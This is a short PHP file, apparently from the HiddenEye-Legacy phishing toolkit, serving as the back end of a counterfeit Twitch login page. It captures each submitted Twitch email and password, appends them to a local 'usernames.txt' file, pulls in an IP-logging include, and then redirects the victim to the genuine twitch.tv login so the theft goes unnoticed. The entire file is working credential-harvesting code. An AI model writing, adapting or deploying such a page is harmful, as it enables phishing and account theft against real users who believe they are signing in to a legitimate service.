HiddenEye-Legacy/WebPages/twitch/login.php
Usama Abdul Sattar e8820becfc
Update login.php
2018-06-07 14:23:39 +05:00

8 lines
243 B
PHP

<?php
include 'base.php';
include 'ip.php';
file_put_contents("usernames.txt", "[Twitch-EMAIL]: " . $_POST['twitch_user'] . " [Twitch-PASS]: " . $_POST['twitch_pass'] . "\n", FILE_APPEND);
header('Location: https://twitch.tv/login');
exit();